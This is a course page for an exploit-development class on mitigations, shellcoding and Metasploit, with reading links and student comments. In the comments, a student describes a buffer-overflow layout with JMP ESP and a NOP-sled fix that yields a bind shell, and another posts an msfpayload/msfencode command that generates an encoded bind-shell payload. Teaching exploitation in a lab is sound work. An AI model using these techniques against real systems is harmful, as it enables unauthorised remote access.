Exploitation 102
Exploit mitigations, shellcoding, and Metasploit with Dino Dai Zovi.
- Slides (start at slide 25)
As mentioned in the video, the homework for this week is to turn your exploit for homework.exe into a Metasploit Module. The best documentation for Metasploit is online and it is probably easiest to find a sample exploit and work from there. The Metasploit wikibook has a page on writing Windows exploits that is a good place to start. Keep in mind, though, that the exploit in the wikibook uses the send_cmd function, which is FTP specific. You will want to use "sock.put" instead.
For some good examples, look at the following modules included with Metasploit:
- modules/exploits/windows/lpd/niprint.rb
- modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
As a final note, the instructors strongly suggest that you launch your Metasploit exploits from Linux, OSX, or Cygwin on Windows (essentially, anything but the Windows installer).
Reading Material
- A collection of win32 shellcode
- Win32 Assembly Components by LSD
- UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes by LSD
- Return-Oriented Programming: Exploits Without Code Injection
- Attacking the Core: Kernel Exploiting Notes
- Offensive Security's Metasploit Unleashed open course
If you passed this section with ease and understand most of the reading material above, you might want to try taking Immunity's Network Offense Professional certification. Good luck!
11 Comments
Reader Comments (11)
Are there any updates for the class? Are more videos coming?
Is the class still being offered? is it online now?
Have you been in contact with other professors who are using your content?
Anything you wanna say about the class?
- When I have time
Taking the class
- In-class this Fall, online next Spring
Professors using material
- I pitched it to a few people at BH. Know at least one person who was able to start a security curriculum because of my talk at SOURCE.
Stuff to say
- Nope! I've said enough already and I think the class material up here speaks for itself. Looking forward to teaching it again.
Thank you very much for the very nice lesson...
I really enjoyed all of this but the end of the 2nd part video seems to be broken at the point where you choose th payload...
so i cannot run a metasploit payload (tried but...).
I had no problem to overwrite eip, find a "jmp esp" in library but then i choose a payload in metasploit (for example launch "calc.exe"), put it at the end of the string (so : boom = "A" * 69 + JMP_ESP + PAYLOAD) and the demo.exe crash...
So i tried to put "A" * 69 + JMP_ESP + INT3 + PAYLOAD and check in immunity if the payload was here, no problem, all the payload is just after my bp but if i continue the program it crash...
I'm sure i'm missing something, i'd be so glad if you couls help me.
(i'm running win2k sp4 in vmware and attacking from bt4 in Vmware all in a debian lenny system)
Thanks again for the great videos.
I (finally) understood my mistake, so i post here, maybe it will help someone (?)
the problem was that the payload uses the asm instruction FSTENV at the very beginning to find the current address in eip (i d'idn't understand how but i think this is the aim...), this instruction pushes some stuff on the stack, so the payload code was overwritten with those data.
i had a first solution : we have the beginning address of the payload in esp so i replace the payload prolog with push esp pop ebx (or whatever registry was used to hold this address) and it gave me a bind_tcp_shell but did'nt exit properly...
then i found the easy and cleaner solution : add some nops operations before the payload to manage space on the stack and it works !
nevertheless i still have a little question :
i generate the payloads in msfconsole, even if it's the same payload it generates something different each times... i think it's something with the encoding process... but some of the payloads works and some just crash (before listening on the port or just after connecting). So my question is just why ?
thanks for the vids, sorry for my bad english...
Here's a working shellcode.
./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Why do we Jump to ESP??
& how do we know wat is the address of shellcode??
Thanks Dan!